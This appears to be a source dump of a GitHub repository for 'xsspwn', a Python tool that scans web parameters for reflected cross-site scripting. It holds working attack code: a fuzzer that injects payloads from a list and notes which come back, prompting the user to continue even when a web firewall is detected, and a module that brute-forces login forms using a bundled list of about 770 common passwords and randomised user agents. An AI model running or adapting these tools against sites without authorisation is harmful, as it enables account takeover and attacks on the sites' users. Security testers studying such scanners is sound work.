├── requirements.txt
├── src
    ├── ui.pyc
    ├── fuzzer.pyc
    ├── __init__.pyc
    ├── bruteforce.pyc
    ├── ui.py
    ├── bruteforce.py
    └── fuzzer.py
├── xsspwn01.PNG
├── xsspwn02.PNG
├── xsspwn03.PNG
├── install.py
├── README.md
├── xsspwn.py
├── wordlist.txt
└── payload.txt


/requirements.txt:
--------------------------------------------------------------------------------
1 | colorama
2 | ansi
3 | user_agent
4 | 
5 | 


--------------------------------------------------------------------------------
/src/ui.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ethicalhackingplayground/xsspwn/HEAD/src/ui.pyc


--------------------------------------------------------------------------------
/xsspwn01.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ethicalhackingplayground/xsspwn/HEAD/xsspwn01.PNG


--------------------------------------------------------------------------------
/xsspwn02.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ethicalhackingplayground/xsspwn/HEAD/xsspwn02.PNG


--------------------------------------------------------------------------------
/xsspwn03.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ethicalhackingplayground/xsspwn/HEAD/xsspwn03.PNG


--------------------------------------------------------------------------------
/src/fuzzer.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ethicalhackingplayground/xsspwn/HEAD/src/fuzzer.pyc


--------------------------------------------------------------------------------
/src/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ethicalhackingplayground/xsspwn/HEAD/src/__init__.pyc


--------------------------------------------------------------------------------
/src/bruteforce.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ethicalhackingplayground/xsspwn/HEAD/src/bruteforce.pyc


--------------------------------------------------------------------------------
/install.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import os
 3 | 
 4 | def install():
 5 | 	print("Installing the required modules..\n")
 6 | 	os.system('pip install -r requirements.txt')
 7 | 	if (os.path.exists('reports') == False):	
 8 | 		print("Setting up some folders..\n")
 9 | 		os.system('mkdir reports')
10 | 
11 | 	print ("Done..")
12 | install()
13 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # xsspwn
 2 | Cross-Site-Scripting (XSS) Automatic Scanner
 3 | 
 4 | ### Description
 5 | This tool is designed to test for xss vulnerabilities in web sites, it uses a list of payloads
 6 | to inject into parameters and check to see if they get reflected back.
 7 | 
 8 | #### Brute Force
 9 | ![Screenshot](xsspwn01.PNG)
10 | 
11 | #### Scan
12 | ![Screenshot](xsspwn02.PNG)
13 | 
14 | #### Injections
15 | ![Screenshot](xsspwn03.PNG)
16 | 
17 | ### How to install
18 | `python install.py`
19 |     
20 | ### Getting Help
21 | `python xsspwn.py -h`
22 | 
23 | ### Bug Fixes
24 | * There is no need for ***tor***, I had problems with that implemented.
25 | * I fixed a bug where it said it only found ***2 Injections***.
26 | 
27 | ### Demo
28 | [https://www.youtube.com/watch?v=FcshLiRMfB4&t=38s](https://www.youtube.com/watch?v=FcshLiRMfB4&t=38s)
29 | 


--------------------------------------------------------------------------------
/src/ui.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | from colorama import Fore,Back,Style
 4 | import datetime
 5 | 
 6 | class UI(object):
 7 | 
 8 | 	def print_text(self, log_type, text):
 9 | 		time = str(datetime.datetime.now())
10 | 		if log_type == "DEBUG":
11 | 			print(Fore.BLUE   +  "[" + time +" DEBUG]: " +  Fore.WHITE + "%s" % (text))
12 | 
13 | 		if log_type == "INFO":
14 | 			print(Style.BRIGHT + Fore.GREEN  +  "[" + time + " INFO]: " + Fore.WHITE + "%s" % (text))
15 | 
16 | 		if log_type == "WARNING":
17 | 			print(Fore.YELLOW +  "[" + time  + " WARNING]: " + Fore.WHITE + "%s" % (text))
18 | 
19 | 		if log_type == "ERROR":
20 | 			print(Fore.RED    +  "[" + time + " ERROR]: " + Fore.WHITE + "%s" % (text))
21 | 
22 | 	def print_found(self, url):
23 | 		time = str(datetime.datetime.now())
24 | 		print( Style.BRIGHT + Fore.GREEN + "[" + time +  " FOUND]: " + Style.BRIGHT + Fore.WHITE + "Potential XSS Found: \n%s"%url)
25 | 


--------------------------------------------------------------------------------
/xsspwn.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python 
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | import argparse
 5 | import os
 6 | from colorama import Fore,Back,Style
 7 | from ansi.colour import fg,bg 
 8 | from src.fuzzer import *
 9 | from src.ui import *
10 | 
11 | def terms():
12 | 	banner()
13 | 	print("""
14 | WARNING: Do not use this tool for illegal activities, I am not hold responsible for any damage or halm that is done.
15 | Using this tool to hack other peoples website can lead to some serious trouble
16 | 	""")
17 | 	agree = raw_input("Do you agree to the terms and conditions: [Y/n]: ")
18 | 	while agree == "":	
19 | 	      agree = raw_input("Do you agree to the terms and conditions: [Y/n]: ") 
20 | 		
21 | 	if (agree == "n" or agree == "N" or agree == "No" or agree == "no" or agree == "NO" or agree == "nO"):
22 | 		print("\nYou have chosen to use this tool for illegal purposes, you must agree to the terms and conditions.")		
23 | 		sys.exit(1)
24 | 	else:
25 | 		os.system('clear')
26 | 		banner()
27 | 
28 | def banner ():
29 | 	os.system('clear')
30 | 	msg = """
31 | 
32 | 
33 | ▀████    ▐████▀    ▄████████    ▄████████    ▄███████▄  ▄█     █▄  ███▄▄▄▄   
34 |   ███▌   ████▀    ███    ███   ███    ███   ███    ███ ███     ███ ███▀▀▀██▄ 
35 |    ███  ▐███      ███    █▀    ███    █▀    ███    ███ ███     ███ ███   ███ 
36 |    ▀███▄███▀      ███          ███          ███    ███ ███     ███ ███   ███ 
37 |    ████▀██▄     ▀███████████ ▀███████████ ▀█████████▀  ███     ███ ███   ███ 
38 |   ▐███  ▀███             ███          ███   ███        ███     ███ ███   ███ 
39 |  ▄███     ███▄     ▄█    ███    ▄█    ███   ███        ███ ▄█▄ ███ ███   ███ 
40 | ████       ███▄  ▄████████▀   ▄████████▀   ▄████▀       ▀███▀███▀   ▀█   █▀  
41 |                                                                              
42 | 		     XSS EXPLOIT SCANNER
43 | 			CODEBY:Krypt0Mux                                                      
44 | """
45 | 	print (fg.red(msg))
46 | 
47 | terms()
48 | parser = argparse.ArgumentParser(description='XSSPwn XSS Exploiter')
49 | requiredNamed = parser.add_argument_group('required named arguments')
50 | requiredNamed.add_argument('-u','--url',     help='the target url', required=True)
51 | requiredNamed.add_argument('-l','--payloads', help='the list of payloads', required=True)
52 | optionalNamed = parser.add_argument_group('optional named arguments')
53 | optionalNamed.add_argument('-p', '--post', help='the post request')
54 | args = parser.parse_args()
55 | 
56 | fuzzer = Fuzz()
57 | fuzzer.set_url(args.url)
58 | fuzzer.set_formdata(args.post)
59 | fuzzer.set_payloads(args.payloads)
60 | fuzzer.fuzz()
61 | 


--------------------------------------------------------------------------------
/src/bruteforce.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | import sys
  4 | import time
  5 | import random
  6 | import os
  7 | import requests
  8 | import urllib
  9 | import urllib2
 10 | from user_agent import generate_user_agent
 11 | from ui import *
 12 | from fuzzer import *
 13 | 
 14 | 
 15 | class Crack:
 16 | 
 17 | 	"""
 18 | 	Assign the session
 19 | 	"""
 20 | 	def set_session(self, session):
 21 | 		self.session = session
 22 | 
 23 | 	"""
 24 | 	Assign the post data
 25 | 	"""
 26 | 	def set_postdata(self, postdata):
 27 | 		if (postdata != None):
 28 | 			self.postdata = postdata
 29 | 		else:
 30 | 			self.postdata = None
 31 | 
 32 | 	"""
 33 | 	Assign the Login URL
 34 | 	"""
 35 | 	def set_loginurl(self, loginurl):
 36 | 		self.loginurl = loginurl	
 37 | 
 38 | 	"""
 39 | 	Login to the website
 40 | 	"""		
 41 | 	def bruteforce(self):
 42 | 
 43 | 		c = self.postdata.split("&")
 44 | 		if len(c) > 3:
 45 | 			ui = UI()
 46 | 			ui.print_text("ERROR", "XSSPWN only works with 3 parameters")
 47 | 			sys.exit(1)
 48 | 			
 49 | 
 50 | 		option = raw_input("Do you want to bruteforce the password [Y/n]: ")
 51 | 		if option == "n" or option == "N" or option == "No" or option == "no":
 52 | 			username = raw_input("Username: ")
 53 | 			password = raw_input("Password: ")
 54 | 			ui = UI()
 55 | 			if (self.login(username, password)):
 56 | 				ui.print_text('INFO', "Successful login with %s:%s" % (username, password))
 57 | 				time.sleep(5)
 58 | 			else:
 59 | 				ui.print_text("ERROR", "Failed Login With %s:%s" % (username, password))
 60 | 				sys.exit(1)
 61 | 
 62 | 		else:
 63 | 	
 64 | 			wordlist = raw_input("Enter the name of the dictionary leave empty for default [ " + Fore.GREEN + "wordlist.txt" + Fore.WHITE + " ]: ")
 65 | 			if (wordlist == ""):
 66 | 				wordlist = "wordlist.txt"
 67 | 				if (os.path.isfile(wordlist) == False):
 68 | 					ui.print_text("ERROR", 'Default wordlist is missing..')
 69 | 					sys.exit(1)
 70 | 
 71 | 
 72 | 			username = raw_input("Enter the username: ")
 73 | 			while (username == ""): 			
 74 | 			       username = raw_input("Enter the username: ")
 75 | 
 76 | 			self.crack(wordlist, username)
 77 | 	"""
 78 | 	Returns the session
 79 | 	"""
 80 | 	def get_session(self):
 81 | 		return self.session
 82 | 
 83 | 	"""
 84 | 	Crack the password
 85 | 	"""
 86 | 	def crack(self, wordlist, username):
 87 | 		ui = UI()	
 88 | 		if (self.postdata == None):
 89 | 			ui.print_text("ERROR", "No postdata set for bruteforce")
 90 | 			sys.exit(1)				
 91 | 	
 92 | 		if (os.path.isfile(wordlist)):
 93 | 			lines = open(wordlist, 'r').readlines()
 94 | 			for line in lines:
 95 | 				password = line.split()[0]
 96 | 				if (self.login(username, password)):
 97 | 					ui.print_text('INFO', "Successful login with %s:%s" % (username, password))
 98 | 					time.sleep(5)
 99 | 					break
100 | 				else:
101 | 					ui.print_text("ERROR", "Attempting Login With %s:%s" % (username, password))
102 | 					time.sleep(1)
103 | 		else:
104 | 			ui.print_text('ERROR', "Wordlist does not exist")
105 | 			sys.exit(1)
106 | 			
107 | 		
108 | 	"""
109 | 	Attempt to login
110 | 	"""			
111 | 	def login(self, username, password):
112 | 
113 | 		postusr = self.postdata.replace('^USER^', username)
114 | 		postpas = postusr.replace('^PASS^', password)
115 | 		newpost = postpas.split('&')
116 | 		formdata = []
117 | 		payload = dict()
118 | 		formdata.append( newpost[0].split('=')[0] )
119 | 		formdata.append( newpost[1].split('=')[0] )
120 | 		formdata.append( newpost[2].split('=')[0] )
121 | 		formdata.append( newpost[2].split('=')[1] )
122 | 		
123 | 		payload.update({formdata[0]:username, formdata[1]:password, formdata[2]:formdata[3]})
124 | 		headers = {'User-Agent': generate_user_agent(device_type="desktop", os=('mac', 'linux'))}
125 | 
126 | 		request = self.session.post(self.loginurl, data=payload, headers=headers) 
127 | 		postusr = ""
128 | 		postpas = ""
129 | 		newpost = ""
130 | 		return 'login' not in request.url
131 | 
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | 
139 | 


--------------------------------------------------------------------------------
/src/fuzzer.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | """
  4 | Import the modules
  5 | """
  6 | from bruteforce import *
  7 | from ui import *
  8 | from user_agent import generate_user_agent
  9 | from requests import *
 10 | import sys
 11 | import os
 12 | import time
 13 | 
 14 | class Fuzz ():
 15 | 
 16 | 
 17 | 	"""
 18 | 	Assign the list of payloads
 19 | 	"""
 20 | 	def set_payloads (self, payloadlist):
 21 | 		self.payloadlist = payloadlist
 22 | 
 23 | 
 24 | 	"""
 25 | 	Assign the url
 26 | 	"""
 27 | 	def set_url (self, url):
 28 | 		self.url = url
 29 | 
 30 | 
 31 | 	"""
 32 | 	Return the URL
 33 | 	"""
 34 | 	def get_url (self,payload):
 35 | 		if "INJECT" in self.url:
 36 | 			newUrl = self.url.replace('INJECT', payload)
 37 | 			return newUrl
 38 | 
 39 | 		else:
 40 | 			ui = UI()
 41 | 			ui.print_text("ERROR", "Make Sure to put INJECT into the parameter you want to test")
 42 | 			sys.exit(1)
 43 | 
 44 | 	def set_formdata(self, postdata):
 45 | 		if postdata != None:
 46 | 			self.postdata = postdata			
 47 | 		else:
 48 | 			self.postdata = None
 49 | 
 50 | 		
 51 | 
 52 | 	"""
 53 | 	Return the list of payloads from a file.
 54 | 	"""
 55 | 	def get_payload (self):
 56 | 		if (os.path.isfile(self.payloadlist)):				
 57 | 			 return open(self.payloadlist, 'r')
 58 | 		else:
 59 | 			print None
 60 | 
 61 | 	"""
 62 | 	Save the links to a file
 63 | 	"""
 64 | 	def save_vuln_links(self, links):
 65 | 		ui = UI()
 66 | 		ui.print_text("INFO", "Saving the links to a file..")
 67 | 		f = open('reports/report.txt', 'w+')
 68 | 		i = 0
 69 | 		while i != len(links):
 70 | 			f.write(links[i].encode('utf-8') + "\n")
 71 | 			i = i + 1
 72 | 		f.close()
 73 | 		ui.print_text("DEBUG", "Done..")
 74 | 
 75 | 
 76 | 
 77 | 	"""
 78 | 	Detects a WAF Firewall
 79 | 	"""
 80 | 	def detect_waf(self, response):
 81 | 
 82 | 		ui = UI()
 83 | 		if ("4" in str(response)):
 84 | 			ui.print_text("WARNING", "site %s seems to be behind a WAF" % self.url) 
 85 | 
 86 | 			if response.find('WebKnight') >= 0:
 87 | 	       			ui.print_text("DEBUG", "Firewall detected: WebKnight")
 88 | 				return True
 89 | 
 90 | 			elif response.find('Mod_Security') >= 0:
 91 | 		      		ui.print_text("DEBUG", "Firewall detected: Mod Security")
 92 | 				return True
 93 | 
 94 | 			elif response.find('Mod_Security') >= 0:
 95 | 		      		ui.print_text("DEBUG", "Firewall detected: Mod Security")
 96 | 				return True
 97 | 
 98 | 			elif response.find('dotDefender') >= 0:
 99 | 		      		ui.print_text("DEBUG", "Firewall detected: Dot Defender")
100 | 				return True
101 | 
102 | 			else:
103 | 	      	      		ui.print_text("INFO", "No Firewall Present")
104 | 				return False
105 | 
106 | 
107 | 	"""
108 | 	Read the response
109 | 	"""
110 | 	def read_response(self, session, url):
111 | 		ui = UI()
112 | 
113 | 		headers = {'User-Agent': generate_user_agent(device_type="desktop", os=('mac', 'linux'))}	
114 | 		ui.print_text('DEBUG', 'Using User-Agent %s' % headers)
115 | 		page_response = session.get(url, headers=headers)
116 | 
117 | 		# Detect a Web Application Firwall.
118 | 		if (self.detect_waf(page_response)):
119 | 			option = raw_input("Do you want to continue: [Y/n]: ")
120 | 			if (option == "n" or option == "N" or option == "No" or option == "no" or option == "nO"):
121 | 				# Exit because website is behind a WAF
122 | 				sys.exit(1)
123 | 			else:
124 | 				return page_response
125 | 		else:
126 | 			return page_response
127 | 	
128 | 
129 | 	"""
130 | 	Start the fuzzer
131 | 	"""
132 | 	def fuzz(self):
133 | 
134 | 		ui = UI()
135 | 		ui.print_text('DEBUG', "Scanning URL for XSS: %s" % self.url)
136 | 		ui.print_text('DEBUG', "Please be patient...")
137 | 
138 | 		if (self.postdata != None):
139 | 			if ("^USER^" not in self.postdata or "^PASS^" not in self.postdata):
140 | 				ui = UI()
141 | 				ui.print_text("ERROR", "Make sure to put ^USER^ and ^PASS^ into the username and password fields and")
142 | 				sys.exit(1)
143 | 
144 | 		payloadf = self.get_payload()
145 | 		if (payloadf == None):
146 | 			ui.print_text("ERROR", "%s Does not exist" % self.payloadlist)
147 | 			sys.exit(1)
148 | 
149 | 
150 | 		vulns = []
151 | 		lines = [line.decode('utf-8').strip() for line in payloadf.readlines()]
152 | 		u = self.get_url(lines[0])
153 | 		try:
154 | 			r = requests.get(u)
155 | 		except ConnectionError as e:
156 | 			ui.print_text('ERROR', 'Connection problem %s' % e)
157 | 			sys.exit(1)
158 | 		session = requests.Session()
159 | 		global c			
160 | 		c = Crack()
161 | 		c.set_loginurl(r.url)
162 | 		c.set_postdata(self.postdata)
163 | 		c.set_session(session)
164 | 		
165 | 		# Do a simple check to see if we need to login
166 | 		if ('login' in r.url):
167 | 			redir = raw_input("Do you want to redirect to %s [Y/n]:" % r.url)
168 | 			if (redir == 'Yes' or redir == 'Y' or redir == 'yes' or redir == 'y'):
169 | 				ui.print_text("DEBUG", "Redirecting to login page %s" % r.url)						
170 | 				c.bruteforce()
171 | 
172 | 		for line in lines:
173 | 			payload = line
174 | 			u = self.get_url(payload)
175 | 			response = self.read_response(c.get_session(), u)		
176 | 			ui.print_text('DEBUG', 'testing -> ' + Fore.BLUE + '%s' % u)
177 | 		
178 | 			if payload.lower() in response.text.lower():
179 | 				vulns.append(u)
180 | 			time.sleep(1)
181 | 
182 | 
183 | 		if (len(lines) != 0):
184 | 
185 | 			print "\n"
186 | 			index = 0
187 | 			percent = str(len(vulns)) +'/'+ str(len(lines))
188 | 			if (len(vulns)) == 0:
189 | 				ui.print_text('ERROR', "No Injections Found..")
190 | 				sys.exit(1)
191 | 
192 | 
193 | 			ui.print_text('INFO', "Injections Found: %s" %percent)
194 | 			c = raw_input('Do you want to print vulnerable links tested: [Y/n]:')
195 | 			if c == 'Y' or c == 'Yes' or c == 'y' or c == 'yes':
196 | 				print("\n\n--------------------------RESULTS---------------------------------------------------")
197 | 				for u in vulns:
198 | 					ui.print_found(u)
199 | 
200 | 				print("-----------------------------------------------------------------------------------")
201 | 		
202 | 			self.save_vuln_links(vulns)
203 | 


--------------------------------------------------------------------------------
/wordlist.txt:
--------------------------------------------------------------------------------
   1 | 123456
   2 | password
   3 | 123456789
   4 | 12345678
   5 | 12345
   6 | qwerty
   7 | 123123
   8 | 111111
   9 | abc123
  10 | 1234567
  11 | dragon
  12 | 1q2w3e4r
  13 | sunshine
  14 | 654321
  15 | master
  16 | 1234
  17 | football
  18 | 1234567890
  19 | 000000
  20 | computer
  21 | 666666
  22 | superman
  23 | michael
  24 | internet
  25 | iloveyou
  26 | daniel
  27 | 1qaz2wsx
  28 | monkey
  29 | shadow
  30 | jessica
  31 | letmein
  32 | baseball
  33 | whatever
  34 | princess
  35 | abcd1234
  36 | 123321
  37 | starwars
  38 | 121212
  39 | thomas
  40 | zxcvbnm
  41 | trustno1
  42 | killer
  43 | welcome
  44 | jordan
  45 | aaaaaa
  46 | 123qwe
  47 | freedom
  48 | password1
  49 | charlie
  50 | batman
  51 | jennifer
  52 | 7777777
  53 | michelle
  54 | diamond
  55 | oliver
  56 | mercedes
  57 | benjamin
  58 | 11111111
  59 | snoopy
  60 | samantha
  61 | victoria
  62 | matrix
  63 | george
  64 | alexander
  65 | secret
  66 | cookie
  67 | asdfgh
  68 | 987654321
  69 | 123abc
  70 | orange
  71 | fuckyou
  72 | asdf1234
  73 | pepper
  74 | hunter
  75 | silver
  76 | joshua
  77 | banana
  78 | 1q2w3e
  79 | chelsea
  80 | 1234qwer
  81 | summer
  82 | qwertyuiop
  83 | phoenix
  84 | andrew
  85 | q1w2e3r4
  86 | elephant
  87 | rainbow
  88 | mustang
  89 | merlin
  90 | london
  91 | garfield
  92 | robert
  93 | chocolate
  94 | 112233
  95 | samsung
  96 | qazwsx
  97 | matthew
  98 | buster
  99 | jonathan
 100 | ginger
 101 | flower
 102 | 555555
 103 | test
 104 | caroline
 105 | amanda
 106 | maverick
 107 | midnight
 108 | martin
 109 | junior
 110 | 88888888
 111 | anthony
 112 | jasmine
 113 | creative
 114 | patrick
 115 | mickey
 116 | 123
 117 | qwerty123
 118 | cocacola
 119 | chicken
 120 | passw0rd
 121 | forever
 122 | william
 123 | nicole
 124 | hello
 125 | yellow
 126 | nirvana
 127 | justin
 128 | friends
 129 | cheese
 130 | tigger
 131 | mother
 132 | liverpool
 133 | blink182
 134 | asdfghjkl
 135 | andrea
 136 | spider
 137 | scooter
 138 | richard
 139 | soccer
 140 | rachel
 141 | purple
 142 | morgan
 143 | melissa
 144 | jackson
 145 | arsenal
 146 | 222222
 147 | qwe123
 148 | gabriel
 149 | ferrari
 150 | jasper
 151 | danielle
 152 | bandit
 153 | angela
 154 | scorpion
 155 | prince
 156 | maggie
 157 | austin
 158 | veronica
 159 | nicholas
 160 | monster
 161 | dexter
 162 | carlos
 163 | thunder
 164 | success
 165 | hannah
 166 | ashley
 167 | 131313
 168 | stella
 169 | brandon
 170 | pokemon
 171 | joseph
 172 | asdfasdf
 173 | 999999
 174 | metallica
 175 | december
 176 | chester
 177 | taylor
 178 | sophie
 179 | samuel
 180 | rabbit
 181 | crystal
 182 | barney
 183 | xxxxxx
 184 | steven
 185 | ranger
 186 | patricia
 187 | christian
 188 | asshole
 189 | spiderman
 190 | sandra
 191 | hockey
 192 | angels
 193 | security
 194 | parker
 195 | heather
 196 | 888888
 197 | victor
 198 | harley
 199 | 333333
 200 | system
 201 | slipknot
 202 | november
 203 | jordan23
 204 | canada
 205 | tennis
 206 | qwertyui
 207 | casper
 208 | gemini
 209 | asd123
 210 | winter
 211 | hammer
 212 | cooper
 213 | america
 214 | albert
 215 | 777777
 216 | winner
 217 | charles
 218 | butterfly
 219 | swordfish
 220 | popcorn
 221 | penguin
 222 | dolphin
 223 | carolina
 224 | access
 225 | 987654
 226 | hardcore
 227 | corvette
 228 | apples
 229 | 12341234
 230 | sabrina
 231 | remember
 232 | qwer1234
 233 | edward
 234 | dennis
 235 | cherry
 236 | sparky
 237 | natasha
 238 | arthur
 239 | vanessa
 240 | marina
 241 | leonardo
 242 | johnny
 243 | dallas
 244 | antonio
 245 | winston
 246 | snickers
 247 | olivia
 248 | nothing
 249 | iceman
 250 | destiny
 251 | coffee
 252 | apollo
 253 | 696969
 254 | windows
 255 | williams
 256 | school
 257 | madison
 258 | dakota
 259 | angelina
 260 | anderson
 261 | 159753
 262 | 1111
 263 | yamaha
 264 | trinity
 265 | rebecca
 266 | nathan
 267 | guitar
 268 | compaq
 269 | 123123123
 270 | toyota
 271 | shannon
 272 | playboy
 273 | peanut
 274 | pakistan
 275 | diablo
 276 | abcdef
 277 | maxwell
 278 | golden
 279 | asdasd
 280 | 123654
 281 | murphy
 282 | monica
 283 | marlboro
 284 | kimberly
 285 | gateway
 286 | bailey
 287 | 00000000
 288 | snowball
 289 | scooby
 290 | nikita
 291 | falcon
 292 | august
 293 | test123
 294 | sebastian
 295 | panther
 296 | love
 297 | johnson
 298 | godzilla
 299 | genesis
 300 | brandy
 301 | adidas
 302 | zxcvbn
 303 | wizard
 304 | porsche
 305 | online
 306 | hello123
 307 | fuckoff
 308 | eagles
 309 | champion
 310 | bubbles
 311 | boston
 312 | smokey
 313 | precious
 314 | mercury
 315 | lauren
 316 | einstein
 317 | cricket
 318 | cameron
 319 | angel
 320 | admin
 321 | napoleon
 322 | mountain
 323 | lovely
 324 | friend
 325 | flowers
 326 | dolphins
 327 | david
 328 | chicago
 329 | sierra
 330 | knight
 331 | yankees
 332 | wilson
 333 | warrior
 334 | simple
 335 | nelson
 336 | muffin
 337 | charlotte
 338 | calvin
 339 | spencer
 340 | newyork
 341 | florida
 342 | fernando
 343 | claudia
 344 | basketball
 345 | barcelona
 346 | 87654321
 347 | willow
 348 | stupid
 349 | samson
 350 | police
 351 | paradise
 352 | motorola
 353 | manager
 354 | jaguar
 355 | jackie
 356 | family
 357 | doctor
 358 | bullshit
 359 | brooklyn
 360 | tigers
 361 | stephanie
 362 | slayer
 363 | peaches
 364 | miller
 365 | heaven
 366 | elizabeth
 367 | bulldog
 368 | animal
 369 | 789456
 370 | scorpio
 371 | rosebud
 372 | qwerty12
 373 | franklin
 374 | claire
 375 | american
 376 | vincent
 377 | testing
 378 | pumpkin
 379 | platinum
 380 | louise
 381 | kitten
 382 | general
 383 | united
 384 | turtle
 385 | marine
 386 | icecream
 387 | hacker
 388 | darkness
 389 | cristina
 390 | colorado
 391 | boomer
 392 | alexandra
 393 | steelers
 394 | serenity
 395 | please
 396 | montana
 397 | mitchell
 398 | marcus
 399 | lollipop
 400 | jessie
 401 | happy
 402 | cowboy
 403 | 102030
 404 | marshall
 405 | jupiter
 406 | jeremy
 407 | gibson
 408 | fucker
 409 | barbara
 410 | adrian
 411 | 1qazxsw2
 412 | 12344321
 413 | 11111
 414 | startrek
 415 | fishing
 416 | digital
 417 | christine
 418 | business
 419 | abcdefg
 420 | nintendo
 421 | genius
 422 | 12qwaszx
 423 | walker
 424 | q1w2e3
 425 | player
 426 | legend
 427 | carmen
 428 | booboo
 429 | tomcat
 430 | ronaldo
 431 | people
 432 | pamela
 433 | marvin
 434 | jackass
 435 | google
 436 | fender
 437 | asdfghjk
 438 | Password
 439 | 1q2w3e4r5t
 440 | zaq12wsx
 441 | scotland
 442 | phantom
 443 | hercules
 444 | fluffy
 445 | explorer
 446 | alexis
 447 | walter
 448 | trouble
 449 | tester
 450 | qwerty1
 451 | melanie
 452 | manchester
 453 | gordon
 454 | firebird
 455 | engineer
 456 | azerty
 457 | 147258
 458 | virginia
 459 | tiger
 460 | simpsons
 461 | passion
 462 | lakers
 463 | james
 464 | angelica
 465 | 55555
 466 | vampire
 467 | tiffany
 468 | september
 469 | private
 470 | maximus
 471 | loveme
 472 | isabelle
 473 | isabella
 474 | eclipse
 475 | dreamer
 476 | changeme
 477 | cassie
 478 | badboy
 479 | 123456a
 480 | stanley
 481 | sniper
 482 | rocket
 483 | passport
 484 | pandora
 485 | justice
 486 | infinity
 487 | cookies
 488 | barbie
 489 | xavier
 490 | unicorn
 491 | superstar
 492 | stephen
 493 | rangers
 494 | orlando
 495 | money
 496 | domino
 497 | courtney
 498 | viking
 499 | tucker
 500 | travis
 501 | scarface
 502 | pavilion
 503 | nicolas
 504 | natalie
 505 | gandalf
 506 | freddy
 507 | donald
 508 | captain
 509 | abcdefgh
 510 | a1b2c3d4
 511 | speedy
 512 | peter
 513 | nissan
 514 | loveyou
 515 | harrison
 516 | friday
 517 | francis
 518 | dancer
 519 | 159357
 520 | 101010
 521 | spitfire
 522 | saturn
 523 | nemesis
 524 | little
 525 | dreams
 526 | catherine
 527 | brother
 528 | birthday
 529 | 1111111
 530 | wolverine
 531 | victory
 532 | student
 533 | france
 534 | fantasy
 535 | enigma
 536 | copper
 537 | bonnie
 538 | teresa
 539 | mexico
 540 | guinness
 541 | georgia
 542 | california
 543 | sweety
 544 | logitech
 545 | julian
 546 | hotdog
 547 | emmanuel
 548 | butter
 549 | beatles
 550 | 11223344
 551 | tristan
 552 | sydney
 553 | spirit
 554 | october
 555 | mozart
 556 | lolita
 557 | ireland
 558 | goldfish
 559 | eminem
 560 | douglas
 561 | cowboys
 562 | control
 563 | cheyenne
 564 | alex
 565 | testtest
 566 | stargate
 567 | raiders
 568 | microsoft
 569 | diesel
 570 | debbie
 571 | danger
 572 | chance
 573 | asdf
 574 | anything
 575 | aaaaaaaa
 576 | welcome1
 577 | qwert
 578 | hahaha
 579 | forest
 580 | eternity
 581 | disney
 582 | denise
 583 | carter
 584 | alaska
 585 | zzzzzz
 586 | titanic
 587 | shorty
 588 | shelby
 589 | pookie
 590 | pantera
 591 | england
 592 | chris
 593 | zachary
 594 | westside
 595 | tamara
 596 | password123
 597 | pass
 598 | maryjane
 599 | lincoln
 600 | willie
 601 | teacher
 602 | pierre
 603 | michael1
 604 | leslie
 605 | lawrence
 606 | kristina
 607 | kawasaki
 608 | drowssap
 609 | college
 610 | blahblah
 611 | babygirl
 612 | avatar
 613 | alicia
 614 | regina
 615 | qqqqqq
 616 | poohbear
 617 | miranda
 618 | madonna
 619 | florence
 620 | sapphire
 621 | norman
 622 | hamilton
 623 | greenday
 624 | galaxy
 625 | frankie
 626 | black
 627 | awesome
 628 | suzuki
 629 | spring
 630 | qazwsxedc
 631 | magnum
 632 | lovers
 633 | liberty
 634 | gregory
 635 | 232323
 636 | twilight
 637 | timothy
 638 | swimming
 639 | super
 640 | stardust
 641 | sophia
 642 | sharon
 643 | robbie
 644 | predator
 645 | penelope
 646 | michigan
 647 | margaret
 648 | jesus
 649 | hawaii
 650 | green
 651 | brittany
 652 | brenda
 653 | badger
 654 | a1b2c3
 655 | 444444
 656 | winnie
 657 | wesley
 658 | voodoo
 659 | skippy
 660 | shithead
 661 | redskins
 662 | qwertyu
 663 | pussycat
 664 | houston
 665 | horses
 666 | gunner
 667 | fireball
 668 | donkey
 669 | cherokee
 670 | australia
 671 | arizona
 672 | 1234abcd
 673 | skyline
 674 | power
 675 | perfect
 676 | lovelove
 677 | kermit
 678 | kenneth
 679 | katrina
 680 | eugene
 681 | christ
 682 | thailand
 683 | support
 684 | special
 685 | runner
 686 | lasvegas
 687 | jason
 688 | fuckme
 689 | butthead
 690 | blizzard
 691 | athena
 692 | abigail
 693 | 8675309
 694 | violet
 695 | tweety
 696 | spanky
 697 | shamrock
 698 | red123
 699 | rascal
 700 | melody
 701 | joanna
 702 | hello1
 703 | driver
 704 | bluebird
 705 | biteme
 706 | atlantis
 707 | arnold
 708 | apple
 709 | alison
 710 | taurus
 711 | random
 712 | pirate
 713 | monitor
 714 | maria
 715 | lizard
 716 | kevin
 717 | hummer
 718 | holland
 719 | buffalo
 720 | 147258369
 721 | 007007
 722 | valentine
 723 | roberto
 724 | potter
 725 | magnolia
 726 | juventus
 727 | indigo
 728 | indian
 729 | harvey
 730 | duncan
 731 | diamonds
 732 | daniela
 733 | christopher
 734 | bradley
 735 | bananas
 736 | warcraft
 737 | sunset
 738 | simone
 739 | renegade
 740 | redsox
 741 | philip
 742 | monday
 743 | mohammed
 744 | indiana
 745 | energy
 746 | bond007
 747 | avalon
 748 | terminator
 749 | skipper
 750 | shopping
 751 | scotty
 752 | savannah
 753 | raymond
 754 | morris
 755 | mnbvcxz
 756 | michele
 757 | lucky
 758 | lucifer
 759 | kingdom
 760 | karina
 761 | giovanni
 762 | cynthia
 763 | a123456
 764 | 147852
 765 | 12121212
 766 | wildcats
 767 | ronald
 768 | portugal
 769 | mike
 770 | helpme
 771 | froggy
 772 | dragons
